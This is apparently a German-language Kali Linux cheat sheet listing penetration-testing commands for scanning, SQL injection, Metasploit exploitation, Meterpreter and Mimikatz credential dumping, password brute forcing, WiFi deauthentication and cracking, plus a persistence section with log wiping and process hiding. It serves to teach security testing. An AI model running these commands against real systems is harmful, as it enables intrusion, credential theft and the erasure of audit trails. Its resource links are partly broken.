Kali Linux Cheatsheet¶
_
_
Kali Linux ist eine Debian-basierte Linux-Distribution, die speziell für digitale Forensik und Penetrationstests entwickelt wurde. Kali Linux wird von Offensive Security entwickelt und gepflegt und wird mit über 600 Penetrationstests vorinstalliert, so dass es die Plattform für Cybersicherheitsexperten, ethische Hacker und Sicherheitsforscher weltweit ist.
Installation und Inbetriebnahme
Download und Installation¶
# Download Kali Linux ISO
wget https://cdimage.kali.org/kali-2024.1/kali-linux-2024.1-installer-amd64.iso
# Verify checksum
sha256sum kali-linux-2024.1-installer-amd64.iso
# Create bootable USB (Linux)
sudo dd if=kali-linux-2024.1-installer-amd64.iso of=/dev/sdX bs=4M status=progress
# Create bootable USB (Windows - use Rufus or similar tool)
# Use Rufus, Etcher, or Win32DiskImager
Virtual Machine Setup¶
# VMware recommended settings
# RAM: 4GB minimum, 8GB recommended
# Storage: 80GB minimum
# Network: NAT or Bridged
# VirtualBox recommended settings
# RAM: 4GB minimum, 8GB recommended
# Storage: 80GB minimum, VDI format
# Network: NAT or Bridged
# Enable VT-x/AMD-V virtualization
Initial Configuration¶
# Update system
sudo apt update && sudo apt upgrade -y
# Install additional tools
sudo apt install -y kali-linux-large
# Configure non-root user (recommended)
sudo useradd -m -s /bin/bash username
sudo usermod -aG sudo username
sudo passwd username
# Enable SSH (if needed)
sudo systemctl enable ssh
sudo systemctl start ssh
# Configure firewall
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
Wesentliche Werkzeuge und Befehle
Information Gathering¶
# Nmap - Network scanning
nmap -sS -sV -O target_ip
nmap -sC -sV -oA scan_results target_ip
nmap --script vuln target_ip
# Masscan - Fast port scanner
masscan -p1-65535 target_ip --rate=1000
# Dmitry - Information gathering
dmitry -winsepo output.txt target.com
# theHarvester - Email and subdomain gathering
theHarvester -d target.com -l 500 -b google
# Recon-ng - Web reconnaissance framework
recon-ng
[recon-ng][default] > workspaces create target_workspace
[recon-ng][target_workspace] > modules load recon/domains-hosts/google_site_web
Schwachstellenbewertung¶
# OpenVAS - Vulnerability scanner
sudo gvm-setup
sudo gvm-start
sudo gvm-feed-update
# Nikto - Web vulnerability scanner
nikto -h http://target.com
nikto -h http://target.com -o nikto_results.txt
# Dirb - Directory brute forcer
dirb http://target.com
dirb http://target.com /usr/share/dirb/wordlists/big.txt
# Gobuster - Directory/file brute forcer
gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dns -d target.com -w /usr/share/wordlists/dnsmap.txt
# WPScan - WordPress vulnerability scanner
wpscan --url http://target.com --enumerate u,p,t
wpscan --url http://target.com --passwords /usr/share/wordlists/rockyou.txt
Web Application Testing¶
# Burp Suite - Web application security testing
burpsuite &
# OWASP ZAP - Web application scanner
zaproxy &
# SQLmap - SQL injection testing
sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump
# Commix - Command injection testing
commix --url="http://target.com/page.php?id=1"
# XSSer - Cross-site scripting testing
xsser --url "http://target.com/search.php?q=XSS" --auto
Exploitation¶
# Metasploit Framework
msfconsole
msf6 > search type:exploit platform:windows
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS target_ip
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
# Searchsploit - Exploit database search
searchsploit apache 2.4
searchsploit -m 12345.py
# Social Engineering Toolkit
setoolkit
# Select from menu options for phishing, credential harvesting, etc.
# BeEF - Browser exploitation framework
beef-xss
# Access web interface at http://127.0.0.1:3000/ui/panel
Post-Exploitation¶
# Meterpreter commands (within Metasploit session)
meterpreter > sysinfo
meterpreter > getuid
meterpreter > ps
meterpreter > migrate PID
meterpreter > hashdump
meterpreter > screenshot
meterpreter > download C:\\file.txt /tmp/
meterpreter > upload /tmp/file.txt C:\\
# Empire - PowerShell post-exploitation
powershell-empire server
powershell-empire client
# Mimikatz - Credential extraction
mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam
Passwort-Angriffe¶
# John the Ripper - Password cracking
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --show hashes.txt
# Hashcat - Advanced password recovery
hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 -a 3 hashes.txt ?a?a?a?a?a?a?a?a
# Hydra - Network login cracker
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target_ip
hydra -L users.txt -P passwords.txt ftp://target_ip
hydra -l admin -P /usr/share/wordlists/rockyou.txt target_ip http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid"
# Medusa - Parallel login brute forcer
medusa -h target_ip -u admin -P /usr/share/wordlists/rockyou.txt -M ssh
medusa -H hosts.txt -U users.txt -P passwords.txt -M ftp
# Crunch - Wordlist generator
crunch 8 8 -t ,@@@@@@@ -o wordlist.txt
crunch 6 10 abcdefghijklmnopqrstuvwxyz0123456789 -o custom_wordlist.txt
Wireless Security¶
# Aircrack-ng suite - WiFi security testing
# Monitor mode
airmon-ng start wlan0
# Capture packets
airodump-ng wlan0mon
# Capture specific network
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Deauth attack
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Crack WPA/WPA2
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# Reaver - WPS attack
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
# Wifite - Automated wireless attack
wifite --wpa --dict /usr/share/wordlists/rockyou.txt
Digital Forensics¶
# Autopsy - Digital forensics platform
autopsy &
# Volatility - Memory analysis
volatility -f memory.dump imageinfo
volatility -f memory.dump --profile=Win7SP1x64 pslist
volatility -f memory.dump --profile=Win7SP1x64 netscan
volatility -f memory.dump --profile=Win7SP1x64 malfind
# Binwalk - Firmware analysis
binwalk firmware.bin
binwalk -e firmware.bin
# Foremost - File carving
foremost -i disk_image.dd -o recovered_files/
# Sleuth Kit - File system analysis
fls -r disk_image.dd
icat disk_image.dd inode_number > recovered_file
Reverse Engineering¶
# Ghidra - NSA reverse engineering tool
ghidra &
# Radare2 - Reverse engineering framework
r2 binary_file
[0x00000000]> aaa
[0x00000000]> pdf @main
# GDB - GNU Debugger
gdb binary_file
(gdb) run
(gdb) break main
(gdb) continue
(gdb) info registers
# Strings - Extract strings from binaries
strings binary_file
strings -n 10 binary_file|grep -i password
# Hexdump - Hex viewer
hexdump -C binary_file|head -20
xxd binary_file|head -20
Systemverwaltung
Paketmanagement¶
# Update package lists
sudo apt update
# Upgrade all packages
sudo apt upgrade -y
# Install specific tools
sudo apt install -y tool_name
# Install Kali metapackages
sudo apt install -y kali-linux-large
sudo apt install -y kali-linux-everything
sudo apt install -y kali-tools-top10
# Search for packages
apt search keyword
apt show package_name
# Remove packages
sudo apt remove package_name
sudo apt purge package_name
sudo apt autoremove
Service Management¶
# Systemctl commands
sudo systemctl start service_name
sudo systemctl stop service_name
sudo systemctl restart service_name
sudo systemctl enable service_name
sudo systemctl disable service_name
sudo systemctl status service_name
# Common services
sudo systemctl start ssh
sudo systemctl start apache2
sudo systemctl start postgresql
sudo systemctl start mysql
# Check listening ports
netstat -tlnp
ss -tlnp
Netzwerkkonfiguration¶
# Interface configuration
ip addr show
ip link set eth0 up
ip link set eth0 down
# Static IP configuration
sudo nano /etc/network/interfaces
# Add:
# auto eth0
# iface eth0 inet static
# address 192.168.1.100
# netmask 255.255.255.0
# gateway 192.168.1.1
# DNS configuration
sudo nano /etc/resolv.conf
# Add:
# nameserver 8.8.8.8
# nameserver 8.8.4.4
# Restart networking
sudo systemctl restart networking
User Management¶
# Add user
sudo useradd -m -s /bin/bash username
sudo passwd username
# Add user to groups
sudo usermod -aG sudo username
sudo usermod -aG adm username
# Switch user
su - username
sudo -u username command
# View user information
id username
groups username
finger username
# Lock/unlock user
sudo usermod -L username
sudo usermod -U username
Fortgeschrittene Technologien
Custom Tool Installation¶
# Install from source
git clone https://github.com/tool/repository.git
cd repository
make && sudo make install
# Python tools
pip3 install tool_name
pip3 install -r requirements.txt
# Go tools
go install github.com/tool/repository@latest
# Ruby gems
gem install tool_name
# Manual installation
wget https://example.com/tool.tar.gz
tar -xzf tool.tar.gz
cd tool
./configure && make && sudo make install
Environment Customization¶
# Bash aliases
nano ~/.bashrc
# Add useful aliases:
alias ll='ls -la'
alias la='ls -A'
alias l='ls -CF'
alias ..='cd ..'
alias ...='cd ../..'
alias grep='grep --color=auto'
alias nmap='nmap --reason --open --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit'
# Custom functions
function extract() \\\\{
if [ -f $1 ] ; then
case $1 in
*.tar.bz2) tar xjf $1 ;;
*.tar.gz) tar xzf $1 ;;
*.bz2) bunzip2 $1 ;;
*.rar) unrar e $1 ;;
*.gz) gunzip $1 ;;
*.tar) tar xf $1 ;;
*.tbz2) tar xjf $1 ;;
*.tgz) tar xzf $1 ;;
*.zip) unzip $1 ;;
*.Z) uncompress $1 ;;
*.7z) 7z x $1 ;;
*) echo "'$1' cannot be extracted via extract()" ;;
esac
else
echo "'$1' is not a valid file"
fi
\\\\}
# Source the changes
source ~/.bashrc
Automation Scripts¶
# Basic reconnaissance script
#!/bin/bash
TARGET=$1
if [ -z "$TARGET" ]; then
echo "Usage: $0 <target>"
exit 1
fi
echo "Starting reconnaissance on $TARGET"
mkdir -p results/$TARGET
# Nmap scan
echo "Running Nmap scan..."
nmap -sS -sV -sC -O -oA results/$TARGET/nmap_scan $TARGET
# Directory enumeration
echo "Running directory enumeration..."
gobuster dir -u http://$TARGET -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o results/$TARGET/gobuster.txt
# Nikto scan
echo "Running Nikto scan..."
nikto -h http://$TARGET -o results/$TARGET/nikto.txt
echo "Reconnaissance complete. Results saved in results/$TARGET/"
Persistence and Stealth¶
# SSH key persistence
ssh-keygen -t rsa -b 4096
ssh-copy-id user@target_ip
# Cron job persistence
crontab -e
# Add: @reboot /path/to/script.sh
# Service persistence
sudo nano /etc/systemd/system/custom.service
# Create service file for persistence
# Log cleaning
sudo truncate -s 0 /var/log/auth.log
sudo truncate -s 0 /var/log/syslog
history -c && history -w
# Process hiding
nohup ./malicious_binary > /dev/null 2>&1 &
disown
Fehlerbehebung
Häufige Fragen¶
# WiFi adapter not working
sudo airmon-ng check kill
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
# VirtualBox guest additions
sudo apt install -y virtualbox-guest-x11
sudo VBoxClient --clipboard
sudo VBoxClient --draganddrop
# Graphics issues
sudo apt install -y kali-desktop-xfce
sudo dpkg-reconfigure lightdm
# Sound issues
sudo apt install -y pulseaudio
pulseaudio --start
# Network issues
sudo dhclient eth0
sudo systemctl restart networking
sudo systemctl restart NetworkManager
Leistungsoptimierung¶
# Disable unnecessary services
sudo systemctl disable bluetooth
sudo systemctl disable cups
sudo systemctl disable avahi-daemon
# Clean system
sudo apt autoremove
sudo apt autoclean
sudo apt clean
# Monitor resources
htop
iotop
nethogs
iftop
# Optimize for VMs
sudo apt install -y open-vm-tools
sudo apt install -y virtualbox-guest-utils
Die besten Praktiken der Sicherheit
Operationelle Sicherheit¶
# Use VPN for testing
sudo openvpn config.ovpn
# Proxy chains configuration
sudo nano /etc/proxychains.conf
proxychains nmap target_ip
# Tor usage
sudo systemctl start tor
proxychains firefox
# MAC address randomization
sudo macchanger -r wlan0
sudo macchanger -m 00:11:22:33:44:55 wlan0
# Secure deletion
shred -vfz -n 3 sensitive_file
wipe -rf directory/
Rechtliche und ethische Überlegungen¶
# Always obtain proper authorization
# Document scope and limitations
# Follow responsible disclosure
# Maintain confidentiality
# Respect privacy and data protection laws
# Create engagement documentation
echo "Penetration Test Authorization" > authorization.txt
echo "Client: Company Name" >> authorization.txt
echo "Scope: IP ranges, domains" >> authorization.txt
echo "Date: $(date)" >> authorization.txt
echo "Tester: Your Name" >> authorization.txt
Ressourcen
- Kali Linux Offizielle Dokumentation
- (Offensive Security Training)(https://www.offensive-security.com/)
- [Kali Linux Tools](URL_32_
- (http://www.pentest-standard.org/)
- OWASP Test Guide